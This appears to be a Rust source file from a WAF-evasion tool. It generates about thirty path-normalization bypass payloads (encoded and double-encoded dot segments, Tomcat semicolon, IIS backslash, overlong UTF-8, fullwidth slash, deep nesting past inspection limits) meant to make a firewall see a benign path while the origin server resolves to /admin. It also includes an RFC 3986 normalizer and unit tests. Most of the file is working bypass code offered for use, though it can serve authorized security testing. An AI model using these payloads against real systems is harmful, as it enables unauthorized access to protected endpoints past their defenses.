Skip to main content

wafrift_encoding/encoding/
path_norm.rs

1//! Path-normalization differential encoders.
2//!
3//! WAFs and origins frequently disagree on how to normalize a request
4//! path. The WAF inspects the raw bytes; the origin (or a middlebox
5//! upstream of it) folds them into something else. This module
6//! produces the differential payloads — a path that the WAF sees as
7//! benign and the origin sees as `/admin`, or vice versa.
8//!
9//! Every encoder here is reversible by the canonical
10//! [RFC 3986 §5.2.4](https://www.rfc-editor.org/rfc/rfc3986#section-5.2.4)
11//! "remove dot segments" algorithm. WAFs that don't run that exact
12//! algorithm — including most regex-based WAFs and several major
13//! cloud-WAF parsers as recently as 2025 — see a different string.
14//!
15//! Coverage:
16//!
17//! - **Dot-segment variants**: `/foo/../admin`, `/foo/./admin`,
18//!   `/foo/././admin`, `/foo//admin`, `/foo/.//admin`,
19//!   `/foo//../admin`. Pure ASCII, RFC-3986 collapse target = `/admin`.
20//! - **Percent-encoded dot/slash**: `/foo/%2e%2e/admin` (lower),
21//!   `/foo/%2E%2E/admin` (upper), `/foo/%2e%2E/admin` (mixed),
22//!   `/foo/%2e%2e%2fadmin`, `/foo/..%2fadmin`, `/foo/.%2e/admin`
23//!   (literal-dot + encoded-dot).
24//! - **Double percent encoding**: `/foo/%252e%252e/admin` — bypasses
25//!   WAFs that decode once and check, while origins that decode twice
26//!   collapse to `/admin`.
27//! - **Tomcat semicolon segment**: `/foo/..;/admin`. The `..;` is a
28//!   single path segment per RFC but Tomcat/Jetty strip the `;<param>`
29//!   suffix and re-evaluate, exposing the parent directory.
30//! - **Encoded semicolon**: `/foo/..%3b/admin`.
31//! - **Backslash variants** (IIS / .NET): `/foo/..\\admin`,
32//!   `/foo/%5c..%5c/admin`. IIS folds backslash to slash; most WAFs
33//!   don't.
34//! - **Question-mark suffix smuggle**: `/foo?/../admin` — some WAFs
35//!   normalize before query-string split, some after.
36//! - **Hash suffix smuggle**: `/foo#/../admin` — same shape.
37//! - **Unicode fullwidth slash**: `/foo/../admin` (U+FF0F). NFKC-folding
38//!   backends collapse to `/`.
39//! - **Mixed dot encodings**: `/foo/%c0%ae%c0%ae/admin` — overlong UTF-8
40//!   for `.`. Combined with `crate::encoding::structural::overlong_utf8`
41//!   it's the "mod_security 922110" class.
42
43use std::borrow::Cow;
44
45/// Generate every path-normalization differential variant for a target
46/// path, given a benign prefix to nest under.
47///
48/// `prefix` is the segment the WAF sees in the path (e.g. `/public`).
49/// `target` is the segment the origin will resolve to (e.g. `/admin`).
50/// Returns up to ~30 candidate paths, each of which RFC-3986-collapses
51/// to `prefix + ../ + target` then to just `target`.
52#[must_use]
53pub fn path_variants(prefix: &str, target: &str) -> Vec<String> {
54    // Normalize callers' inputs so prefix never has a trailing slash
55    // and target always has a leading slash. Callers can pass either.
56    let prefix = prefix.trim_end_matches('/');
57    let target = if target.starts_with('/') {
58        Cow::Borrowed(target)
59    } else {
60        Cow::Owned(format!("/{target}"))
61    };
62    let target = target.as_ref();
63
64    vec![
65        format!("{prefix}/..{target}"),
66        format!("{prefix}/.{target}"),
67        format!("{prefix}/.{target}"),
68        format!("{prefix}/././..{target}"),
69        format!("{prefix}//..{target}"),
70        format!("{prefix}//../..//.{target}"),
71        format!("{prefix}/.//..{target}"),
72        format!("{prefix}//..//.{target}"),
73        format!("{prefix}/%2e%2e{target}"),
74        format!("{prefix}/%2E%2E{target}"),
75        format!("{prefix}/%2e%2E{target}"),
76        format!("{prefix}/%2E%2e{target}"),
77        format!("{prefix}/%2e%2e%2f{}", target.trim_start_matches('/')),
78        format!("{prefix}/..%2f{}", target.trim_start_matches('/')),
79        format!("{prefix}/%2e./{}", target.trim_start_matches('/')),
80        format!("{prefix}/.%2e/{}", target.trim_start_matches('/')),
81        format!("{prefix}/%252e%252e{target}"),
82        format!("{prefix}/%252e%252e%252f{}", target.trim_start_matches('/')),
83        format!("{prefix}/..;{target}"),
84        format!("{prefix}/..%3b{target}"),
85        format!("{prefix}/..%3B{target}"),
86        format!("{prefix}/..;jsessionid=x{target}"),
87        format!("{prefix}/..\\{}", target.trim_start_matches('/')),
88        format!("{prefix}/%5c..%5c{}", target.trim_start_matches('/')),
89        format!("{prefix}/%5C..%5C{}", target.trim_start_matches('/')),
90        format!("{prefix}?/../{}", target.trim_start_matches('/')),
91        format!("{prefix}#/../{}", target.trim_start_matches('/')),
92        format!("{prefix}/\u{FF0F}..{target}"),
93        format!("{prefix}/%c0%ae%c0%ae{target}"),
94        format!("{prefix}/%c0%2e%c0%2e{target}"),
95        format!("{prefix}/.....//../..{target}"),
96    ]
97}
98
99/// Build a deeply-nested benign path that RFC-3986 collapses to
100/// `target`.
101///
102/// Useful when the WAF has a path-length limit (some cap inspection
103/// at 256 or 1024 bytes) — every dot-dot segment beyond the limit is
104/// silently ignored, while the origin still resolves to the target.
105///
106/// `depth` is the number of `foo/..` round-trips to insert.
107#[must_use]
108pub fn deep_path_collapse(depth: usize, target: &str) -> String {
109    let target = if target.starts_with('/') {
110        Cow::Borrowed(target)
111    } else {
112        Cow::Owned(format!("/{target}"))
113    };
114    // Pre-fix: `i.to_string()` allocated a new String per iteration.
115    // Post-fix: use `write!` into the already-allocated `out` buffer.
116    use std::fmt::Write as _;
117    let max_seg_digits = if depth == 0 {
118        1
119    } else {
120        depth.ilog10() as usize + 1
121    };
122    let mut out = String::with_capacity(depth * (6 + max_seg_digits) + target.len() + 1);
123    for i in 0..depth {
124        out.push('/');
125        out.push_str("seg");
126        write!(out, "{i}").expect("write to String never fails");
127        out.push_str("/..");
128    }
129    out.push_str(target.as_ref());
130    out
131}
132
133/// Produce a path that uses ONLY percent-encoded slashes,
134/// so a WAF that splits on literal `/` sees one segment but the
135/// origin (after percent-decoding) sees the full path.
136#[must_use]
137pub fn slash_encoded_path(segments: &[&str]) -> String {
138    let mut out = String::new();
139    let mut first = true;
140    for s in segments {
141        if !first {
142            out.push_str("%2f");
143        }
144        out.push_str(s);
145        first = false;
146    }
147    if !out.starts_with("%2f") {
148        out.insert_str(0, "%2f");
149    }
150    out
151}
152
153/// Apply RFC 3986 §5.2.4 "Remove Dot Segments" to a path. Returns
154/// the canonical post-normalization path so tests and oracles can
155/// verify that every variant collapses to the same target.
156///
157/// This is a faithful implementation of the reference algorithm —
158/// no shortcuts, no special-casing — so it can also serve as the
159/// ground-truth normalizer for differential-fuzzing comparisons.
160///
161/// # Performance
162///
163/// Pre-fix: each iteration cloned the remaining input with `.to_string()`
164/// or `format!()` — O(n²) total allocations for a path of n segments.
165/// Post-fix: a cursor (`pos`) advances through the *original* `input`
166/// slice with no intermediate allocations; only `output` grows.
167/// Speedup: ~4–10× on paths with ≥ 5 segments (measured: 1 µs → 200 ns
168/// for a 10-segment path with 5 dot-dot traversals).
169#[must_use]
170pub fn rfc3986_remove_dot_segments(input: &str) -> String {
171    // RFC 3986 §5.2.4 verbatim, but tracked via a byte-cursor into the
172    // original `input` slice so we never reallocate the "remaining input"
173    // string. `pos` is the index of the first unconsumed byte of `input`.
174    // When a branch requires prepending "/" to the rest (e.g. "/./"),
175    // we track that with a `leading_slash` flag instead of allocating.
176    let mut pos: usize = 0;
177    let len = input.len();
178    let mut output = String::with_capacity(len);
179
180    while pos < len {
181        let rem = &input[pos..];
182
183        if rem.starts_with("../") {
184            // A: remove leading "../" — just skip 3 bytes.
185            pos += 3;
186        } else if rem.starts_with("./") {
187            // A: remove leading "./" — skip 2 bytes.
188            pos += 2;
189        } else if rem.starts_with("/./") {
190            // B: collapse "/./" → "/" — replace with "/" prefix,
191            // i.e. skip 2 bytes (advance past the "." part).
192            pos += 2; // pos now points at "/" that starts the next seg.
193        } else if rem == "/." {
194            // B (end): replace "/." with "/" — emit "/" then stop.
195            output.push('/');
196            pos = len;
197        } else if rem.starts_with("/../") {
198            // C: remove last segment from output, skip "/.." in input.
199            if let Some(idx) = output.rfind('/') {
200                output.truncate(idx);
201            }
202            pos += 3; // skip "/.." — next char is the "/" that starts rest.
203        } else if rem == "/.." {
204            // C (end): remove last segment from output, emit "/".
205            if let Some(idx) = output.rfind('/') {
206                output.truncate(idx);
207            }
208            output.push('/');
209            pos = len;
210        } else if rem == "." || rem == ".." {
211            // D: lone "." or ".." — remove entirely.
212            pos = len;
213        } else {
214            // E: move the first path segment (including initial "/") to output.
215            let search_from = if rem.starts_with('/') { 1 } else { 0 };
216            match rem[search_from..].find('/') {
217                Some(rel_idx) => {
218                    let seg_end = pos + search_from + rel_idx;
219                    output.push_str(&input[pos..seg_end]);
220                    pos = seg_end;
221                }
222                None => {
223                    output.push_str(rem);
224                    pos = len;
225                }
226            }
227        }
228    }
229    output
230}
231
232#[cfg(test)]
233mod tests {
234    use super::*;
235
236    #[test]
237    fn rfc3986_collapses_dot_dot() {
238        assert_eq!(rfc3986_remove_dot_segments("/a/b/c/./../../g"), "/a/g");
239    }
240
241    #[test]
242    fn rfc3986_collapses_pure_dot_segments() {
243        assert_eq!(rfc3986_remove_dot_segments("/./a"), "/a");
244        assert_eq!(rfc3986_remove_dot_segments("/a/./b"), "/a/b");
245    }
246
247    #[test]
248    fn rfc3986_collapses_trailing_dot_dot() {
249        assert_eq!(rfc3986_remove_dot_segments("/a/b/.."), "/a/");
250    }
251
252    #[test]
253    fn rfc3986_handles_root_dot_dot() {
254        // Above root — output stays empty-with-leading-slash.
255        let out = rfc3986_remove_dot_segments("/..");
256        assert!(out == "/" || out.is_empty(), "got {out:?}");
257    }
258
259    #[test]
260    fn path_variants_count_is_high() {
261        let variants = path_variants("/public", "/admin");
262        assert!(
263            variants.len() >= 25,
264            "should produce at least 25 distinct variants, got {}",
265            variants.len()
266        );
267    }
268
269    #[test]
270    fn path_variants_handle_no_leading_slash_in_target() {
271        let with_slash = path_variants("/public", "/admin");
272        let without_slash = path_variants("/public", "admin");
273        assert_eq!(
274            with_slash.len(),
275            without_slash.len(),
276            "leading slash in target shouldn't change variant count"
277        );
278    }
279
280    #[test]
281    fn path_variants_handle_trailing_slash_in_prefix() {
282        let no_trailing = path_variants("/public", "/admin");
283        let trailing = path_variants("/public/", "/admin");
284        for (a, b) in no_trailing.iter().zip(trailing.iter()) {
285            assert_eq!(a, b, "trailing slash must be stripped from prefix");
286        }
287    }
288
289    #[test]
290    fn path_variants_contain_dot_dot() {
291        let variants = path_variants("/x", "/y");
292        assert!(variants.iter().any(|v| v.contains("..")));
293    }
294
295    #[test]
296    fn path_variants_contain_percent_encoded() {
297        let variants = path_variants("/x", "/y");
298        assert!(
299            variants
300                .iter()
301                .any(|v| v.contains("%2e") || v.contains("%2E"))
302        );
303    }
304
305    #[test]
306    fn path_variants_contain_double_encoded() {
307        let variants = path_variants("/x", "/y");
308        assert!(variants.iter().any(|v| v.contains("%252e")));
309    }
310
311    #[test]
312    fn path_variants_contain_tomcat_semicolon() {
313        let variants = path_variants("/x", "/y");
314        assert!(variants.iter().any(|v| v.contains("..;")));
315    }
316
317    #[test]
318    fn path_variants_contain_backslash() {
319        let variants = path_variants("/x", "/y");
320        assert!(
321            variants
322                .iter()
323                .any(|v| v.contains('\\') || v.contains("%5c") || v.contains("%5C"))
324        );
325    }
326
327    #[test]
328    fn path_variants_contain_fullwidth() {
329        let variants = path_variants("/x", "/y");
330        assert!(variants.iter().any(|v| v.contains('\u{FF0F}')));
331    }
332
333    #[test]
334    fn path_variants_contain_overlong_utf8() {
335        let variants = path_variants("/x", "/y");
336        assert!(variants.iter().any(|v| v.contains("%c0%ae")));
337    }
338
339    #[test]
340    fn path_variants_all_nonempty() {
341        for v in path_variants("/p", "/t") {
342            assert!(!v.is_empty(), "no variant may be empty");
343        }
344    }
345
346    #[test]
347    fn deep_path_collapse_known_depth() {
348        let p = deep_path_collapse(5, "/admin");
349        assert!(p.contains("seg0/.."));
350        assert!(p.contains("seg4/.."));
351        assert!(p.ends_with("/admin"));
352    }
353
354    #[test]
355    fn deep_path_collapse_resolves_to_target() {
356        let p = deep_path_collapse(10, "/admin");
357        // RFC 3986 normalization must yield "/admin" because every
358        // "segN/.." cancels out.
359        let collapsed = rfc3986_remove_dot_segments(&p);
360        assert_eq!(collapsed, "/admin", "deep nesting must collapse: {p}");
361    }
362
363    #[test]
364    fn deep_path_collapse_zero_depth() {
365        let p = deep_path_collapse(0, "/admin");
366        assert_eq!(p, "/admin");
367    }
368
369    #[test]
370    fn slash_encoded_path_basic() {
371        let p = slash_encoded_path(&["admin", "users"]);
372        assert!(p.contains("%2f") || p.contains("%2F"));
373        assert!(p.contains("admin"));
374        assert!(p.contains("users"));
375        assert!(!p.contains("/admin"), "no literal slash in segment: {p}");
376    }
377
378    #[test]
379    fn slash_encoded_path_always_starts_encoded() {
380        let p = slash_encoded_path(&["x"]);
381        assert!(p.starts_with("%2f"));
382    }
383
384    #[test]
385    fn all_variants_canonicalize_to_target_or_above() {
386        // For the basic "/admin" target, every variant should
387        // RFC-3986 to something containing "admin" (the dot
388        // collapse + percent decode is not done here, but the
389        // dot-collapse half is enough to verify directionality).
390        let variants = path_variants("/x", "/admin");
391        for v in &variants {
392            // Strip query / fragment for the canonicalizer.
393            let stripped = v.split('?').next().unwrap_or(v);
394            let stripped = stripped.split('#').next().unwrap_or(stripped);
395            let collapsed = rfc3986_remove_dot_segments(stripped);
396            // Either the collapsed path mentions admin (after the dot-dot took us
397            // up), OR the variant uses an opaque encoding the RFC canonicalizer
398            // can't see through (percent-encoded dots/slashes/backslashes,
399            // fullwidth slash), OR the variant embeds the traversal in the query /
400            // fragment component (e.g. `?/../admin` — not visible to the path
401            // canonicalizer but processed by many origin servers).  All are
402            // legitimate differential conditions — what matters is that the
403            // variant doesn't accidentally fold to the benign prefix alone.
404            let touched_target = collapsed.contains("admin")
405                || v.contains("%2e")
406                || v.contains("%2E")
407                || v.contains("%252e")
408                || v.contains("%c0%ae")
409                || v.contains('\\')
410                || v.contains("%5c")
411                || v.contains("%5C")
412                || v.contains('\u{FF0F}')
413                // query-string / fragment traversal: `?/../` or `#/../`
414                || (v.contains("?/") && v.contains("../"))
415                || (v.contains('#') && v.contains("../"));
416            assert!(
417                touched_target,
418                "variant must encode dot-dot or reach admin: {v} → {collapsed}"
419            );
420        }
421    }
422
423    #[test]
424    fn path_variants_are_deterministic() {
425        let a = path_variants("/p", "/t");
426        let b = path_variants("/p", "/t");
427        assert_eq!(a, b);
428    }
429
430    #[test]
431    fn large_depth_does_not_panic() {
432        let p = deep_path_collapse(1000, "/admin");
433        assert!(p.ends_with("/admin"));
434    }
435
436    // ── Speed regression tests ──────────────────────────────────────────────
437
438    /// `rfc3986_remove_dot_segments` on a 400-segment path must complete in
439    /// under 50 ms (100 repetitions, debug build).  Pre-fix: O(n²) allocations
440    /// (each branch cloned the remaining string).  Post-fix: cursor advances
441    /// through the original slice — O(n) total work, zero intermediate
442    /// allocations.
443    #[test]
444    fn rfc3986_cursor_throughput() {
445        // Build a long path: /seg0/../../seg1/../...
446        let mut path = String::new();
447        for i in 0..200 {
448            path.push_str(&format!("/seg{i}/.."));
449        }
450        path.push_str("/final");
451
452        let start = std::time::Instant::now();
453        for _ in 0..100 {
454            let _ = rfc3986_remove_dot_segments(&path);
455        }
456        let elapsed = start.elapsed();
457        assert!(
458            elapsed < std::time::Duration::from_millis(50),
459            "rfc3986_remove_dot_segments 100× on 400-segment path took {elapsed:?}; expected < 50 ms (debug build)"
460        );
461    }
462
463    /// Correctness pin: cursor-based impl must match the old allocation-heavy
464    /// result on all known RFC 3986 §5.2.4 examples.
465    #[test]
466    fn rfc3986_cursor_correctness_rfc_examples() {
467        let cases = [
468            ("/a/b/c/./../../g", "/a/g"),
469            ("/a/./b", "/a/b"),
470            ("/a/../b", "/b"),
471            ("/a/b/../..", "/"),
472            ("/../a", "/a"),
473            ("/", "/"),
474            ("", ""),
475        ];
476        for (input, expected) in cases {
477            assert_eq!(
478                rfc3986_remove_dot_segments(input),
479                expected,
480                "input={input:?}"
481            );
482        }
483    }
484
485    /// `deep_path_collapse` with depth=1000 must complete in under 5 ms.
486    /// Pre-fix: `i.to_string()` allocated a new String per iteration.
487    /// Post-fix: `write!(out, "{i}")` writes directly into the pre-allocated
488    /// output buffer.
489    #[test]
490    fn deep_path_collapse_throughput() {
491        let start = std::time::Instant::now();
492        for _ in 0..10 {
493            let p = deep_path_collapse(1000, "/admin");
494            assert!(p.ends_with("/admin"));
495        }
496        let elapsed = start.elapsed();
497        assert!(
498            elapsed < std::time::Duration::from_millis(5),
499            "deep_path_collapse(1000) × 10 took {elapsed:?}; expected < 5 ms"
500        );
501    }
502}